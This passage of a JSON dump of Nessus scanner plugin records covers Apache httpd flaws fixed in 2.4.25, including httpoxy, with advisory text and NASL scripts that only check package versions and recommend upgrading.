"AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-16T00:00:00", "title": "GLSA-201701-36 : Apache: Multiple vulnerabilities (httpoxy)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2014-3583", "CVE-2016-8743", "CVE-2016-8740", "CVE-2016-5387", "CVE-2016-0736"], "modified": "2017-01-16T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:apache"], "id": "GENTOO_GLSA-201701-36.NASL", "href": "https://www.tenable.com/plugins/nessus/96516", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201701-36.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96516);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-3583\", \"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-5387\", \"CVE-2016-8740\", \"CVE-2016-8743\");\n script_xref(name:\"GLSA\", value:\"201701-36\");\n\n script_name(english:\"GLSA-201701-36 : Apache: Multiple vulnerabilities (httpoxy)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201701-36\n(Apache: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Apache. Please review\n the CVE identifiers, upstream Apache Software Foundation documentation,\n and HTTPoxy website referenced below for details.\n \nImpact :\n\n A remote attacker could cause a Denial of Service condition via multiple\n vectors or response splitting and cache pollution. Additionally, an\n attacker could intercept unsecured (HTTP) transmissions via the HTTPoxy\n vulnerability.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.apache.org/security/asf-httpoxy-response.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://httpoxy.org/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201701-36\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Apache users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/apache-2.4.25'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/apache\", unaffected:make_list(\"ge 2.4.25\"), vulnerable:make_list(\"lt 2.4.25\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-10T17:25:43", "description": "The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Apache :\n\n - A flaw exists in the mod_session_crypto module due to\n encryption for data and cookies using the configured\n ciphers with possibly either CBC or ECB modes of\n operation (AES256-CBC by default). An unauthenticated,\n remote attacker can exploit this, via a padding oracle\n attack, to decrypt information without knowledge of the\n encryption key, resulting in the disclosure of\n potentially sensitive information. (CVE-2016-0736)\n\n - A denial of service vulnerability exists in the\n mod_auth_digest module during client entry allocation.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted input, to exhaust shared memory\n resources, resulting in a server crash. (CVE-2016-2161)\n\n - The Apache HTTP Server is affected by a\n man-in-the-middle vulnerability known as 'httpoxy' due\n to a failure to properly resolve namespace conflicts in\n accordance with RFC 3875 section 4.1.18. The HTTP_PROXY\n environment variable is set based on untrusted user data\n in the 'Proxy' header of HTTP requests. The HTTP_PROXY\n environment variable is used by some web client\n libraries to specify a remote proxy server. An\n unauthenticated, remote attacker can exploit this, via a\n crafted 'Proxy' header in an HTTP request, to redirect\n an application's internal HTTP traffic to an arbitrary\n proxy server where it may be observed or manipulated.\n (CVE-2016-5387)\n\n - A denial of service vulnerability exists in the\n mod_http2 module due to improper handling of the\n LimitRequestFields directive. An unauthenticated, remote\n attacker can exploit this, via specially crafted\n CONTINUATION frames in an HTTP/2 request, to inject\n unlimited request headers into the server, resulting in\n the exhaustion of memory resources. (CVE-2016-8740)\n\n - A flaw exists due to improper handling of whitespace\n patterns in user-agent headers. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted user-agent header, to cause the program to\n incorrectly process sequences of requests, resulting in\n interpreting responses incorrectly, polluting the cache,\n or disclosing the content from one request to a second\n downstream user-agent. (CVE-2016-8743)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-06-26T00:00:00", "title": "Tenable SecurityCenter Apache 2.4.x < 2.4.25 Multiple Vulnerabilities (TNS-2017-04) (httpoxy)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-8740", "CVE-2016-5387", "CVE-2016-0736"], "modified": "2017-06-26T00:00:00", "cpe": ["cpe:/a:tenable:securitycenter"], "id": "SECURITYCENTER_APACHE_2_4_25.NASL", "href": "https://www.tenable.com/plugins/nessus/101044", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101044);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/09\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-5387\",\n \"CVE-2016-8740\",\n \"CVE-2016-8743\"\n );\n script_bugtraq_id(\n 91816,\n 94650,\n 95076,\n 95077,\n 95078\n );\n script_xref(name:\"CERT\", value:\"797896\");\n script_xref(name:\"EDB-ID\", value:\"40961\");\n\n script_name(english:\"Tenable SecurityCenter Apache 2.4.x < 2.4.25 Multiple Vulnerabilities (TNS-2017-04) (httpoxy)\");\n script_summary(english:\"Checks the version of Apache in SecurityCenter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Tenable SecurityCenter application on the remote host contains a\nweb server that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Apache :\n\n - A flaw exists in the mod_session_crypto module due to\n encryption for data and cookies using the configured\n ciphers with possibly either CBC or ECB modes of\n operation (AES256-CBC by default). An unauthenticated,\n remote attacker can exploit this, via a padding oracle\n attack, to decrypt information without knowledge of the\n encryption key, resulting in the disclosure of\n potentially sensitive information. (CVE-2016-0736)\n\n - A denial of service vulnerability exists in the\n mod_auth_digest module during client entry allocation.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted input, to exhaust shared memory\n resources, resulting in a server crash. (CVE-2016-2161)\n\n - The Apache HTTP Server is affected by a\n man-in-the-middle vulnerability known as 'httpoxy' due\n to a failure to properly resolve namespace conflicts in\n accordance with RFC 3875 section 4.1.18. The HTTP_PROXY\n environment variable is set based on untrusted user data\n in the 'Proxy' header of HTTP requests. The HTTP_PROXY\n environment variable is used by some web client\n libraries to specify a remote proxy server. An\n unauthenticated, remote attacker can exploit this, via a\n crafted 'Proxy' header in an HTTP request, to redirect\n an application's internal HTTP traffic to an arbitrary\n proxy server where it may be observed or manipulated.\n (CVE-2016-5387)\n\n - A denial of service vulnerability exists in the\n mod_http2 module due to improper handling of the\n LimitRequestFields directive. An unauthenticated, remote\n attacker can exploit this, via specially crafted\n CONTINUATION frames in an HTTP/2 request, to inject\n unlimited request headers into the server, resulting in\n the exhaustion of memory resources. (CVE-2016-8740)\n\n - A flaw exists due to improper handling of whitespace\n patterns in user-agent headers. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted user-agent header, to cause the program to\n incorrectly process sequences of requests, resulting in\n interpreting responses incorrectly, polluting the cache,\n or disclosing the content from one request to a second\n downstream user-agent. (CVE-2016-8743)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/tns-2017-04\");\n script_set_attribute(attribute:\"see_also\", value:\"https://static.tenable.com/prod_docs/upgrade_security_center.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Tenable SecurityCenter version 5.4.3 or later.\nAlternatively, contact the vendor for a patch.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"Score based on analysis of the vendor advisory.\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n \n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:tenable:securitycenter\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"securitycenter_installed.nbin\", \"securitycenter_detect.nbin\");\n script_require_ports(\"Host/SecurityCenter/Version\", \"installed_sw/SecurityCenter\", \"Host/SecurityCenter/support/httpd/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Apache (within SecurityCenter)\";\nfix = \"2.4.25\";\n\nsc_ver = get_kb_item(\"Host/SecurityCenter/Version\");\nport = 0;\nif(empty_or_null(sc_ver))\n{\n port = 443;\n install = get_single_install(app_name:\"SecurityCenter\", combined:TRUE, exit_if_unknown_ver:TRUE);\n sc_ver = install[\"version\"];\n}\nif (empty_or_null(sc_ver)) audit(AUDIT_NOT_INST, \"SecurityCenter\");\n\nversion = get_kb_item(\"Host/SecurityCenter/support/httpd/version\");\nif (empty_or_null(version)) audit(AUDIT_UNKNOWN_APP_VER, app);\n\nif (ver_compare(ver:version, minver:\"2.3\", fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n SecurityCenter version : ' + sc_ver +\n '\\n SecurityCenter Apache version : ' + version +\n '\\n Fixed Apache version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app, version);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T09:10:57", "description": "New httpd packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.", "edition": 22, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-27T00:00:00", "title": "Slackware 14.0 / 14.1 / 14.2 / current : httpd (SSA:2016-358-01) (httpoxy)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-8740", "CVE-2016-5387", "CVE-2016-0736"], "modified": "2016-12-27T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.0", "p-cpe:/a:slackware:slackware_linux:httpd", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2016-358-01.NASL", "href": "https://www.tenable.com/plugins/nessus/96090", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-358-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96090);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-5387\", \"CVE-2016-8740\", \"CVE-2016-8743\");\n script_xref(name:\"SSA\", value:\"2016-358-01\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : httpd (SSA:2016-358-01) (httpoxy)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New httpd packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.495677\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?897798bc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:54:44", "description": "Apache Software Foundation reports :\n\nPlease reference CVE/URL list for details", "edition": 27, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-21T00:00:00", "title": "FreeBSD : Apache httpd -- several vulnerabilities (862d6ab3-c75e-11e6-9f98-20cf30e32f6d) (httpoxy)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-8740", "CVE-2016-5387", "CVE-2016-0736"], "modified": "2016-12-21T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:apache24"], "id": "FREEBSD_PKG_862D6AB3C75E11E69F9820CF30E32F6D.NASL", "href": "https://www.tenable.com/plugins/nessus/96037", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96037);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-5387\", \"CVE-2016-8740\", \"CVE-2016-8743\");\n\n script_name(english:\"FreeBSD : Apache httpd -- several vulnerabilities (862d6ab3-c75e-11e6-9f98-20cf30e32f6d) (httpoxy)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Apache Software Foundation reports :\n\nPlease reference CVE/URL list for details\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://httpd.apache.org/security/vulnerabilities_24.html\"\n );\n # https://vuxml.freebsd.org/freebsd/862d6ab3-c75e-11e6-9f98-20cf30e32f6d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5975d85c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache24<2.4.25\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-29T09:19:54", "description": "According to its banner, the version of Apache running on the remote\nhost is 2.4.x prior to 2.4.25. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A flaw exists in the mod_session_crypto module due to\n encryption for data and cookies using the configured\n ciphers with possibly either CBC or ECB modes of\n operation (AES256-CBC by default). An unauthenticated,\n remote attacker can exploit this, via a padding oracle\n attack, to decrypt information without knowledge of the\n encryption key, resulting in the disclosure of\n potentially sensitive information. (CVE-2016-0736)\n\n - A denial of service vulnerability exists in the\n mod_auth_digest module during client entry allocation.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted input, to exhaust shared memory\n resources, resulting in a server crash. (CVE-2016-2161)\n\n - The Apache HTTP Server is affected by a\n man-in-the-middle vulnerability known as 'httpoxy' due\n to a failure to properly resolve namespace conflicts in\n accordance with RFC 3875 section 4.1.18. The HTTP_PROXY\n environment variable is set based on untrusted user data\n in the 'Proxy' header of HTTP requests. The HTTP_PROXY\n environment variable is used by some web client\n libraries to specify a remote proxy server. An\n unauthenticated, remote attacker can exploit this, via a\n crafted 'Proxy' header in an HTTP request, to redirect\n an application's internal HTTP traffic to an arbitrary\n proxy server where it may be observed or manipulated.\n (CVE-2016-5387)\n\n - A denial of service vulnerability exists in the\n mod_http2 module due to improper handling of the\n LimitRequestFields directive. An unauthenticated, remote\n attacker can exploit this, via specially crafted\n CONTINUATION frames in an HTTP/2 request, to inject\n unlimited request headers into the server, resulting in\n the exhaustion of memory resources. (CVE-2016-8740)\n\n - A flaw exists due to improper handling of whitespace\n patterns in user-agent headers. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted user-agent header, to cause the program to\n incorrectly process sequences of requests, resulting in\n interpreting responses incorrectly, polluting the cache,\n or disclosing the content from one request to a second\n downstream user-agent. (CVE-2016-8743)\n\n - A CRLF injection allowing HTTP response splitting attacks for \n sites which use mod_userdir (CVE-2016-4975)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 35, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-12T00:00:00", "title": "Apache 2.4.x < 2.4.25 Multiple Vulnerabilities (httpoxy)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-4975", "CVE-2016-8743", "CVE-2020-11985", "CVE-2016-8740", "CVE-2016-5387", "CVE-2016-0736"], "modified": "2017-01-12T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_2_4_25.NASL", "href": "https://www.tenable.com/plugins/nessus/96451", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96451);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/28\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-4975\",\n \"CVE-2016-5387\",\n \"CVE-2016-8740\",\n \"CVE-2016-8743\",\n \"CVE-2020-11985\"\n );\n script_bugtraq_id(\n 91816,\n 94650,\n 95076,\n 95077,\n 95078,\n 105093\n );\n script_xref(name:\"CERT\", value:\"797896\");\n script_xref(name:\"EDB-ID\", value:\"40961\");\n\n script_name(english:\"Apache 2.4.x < 2.4.25 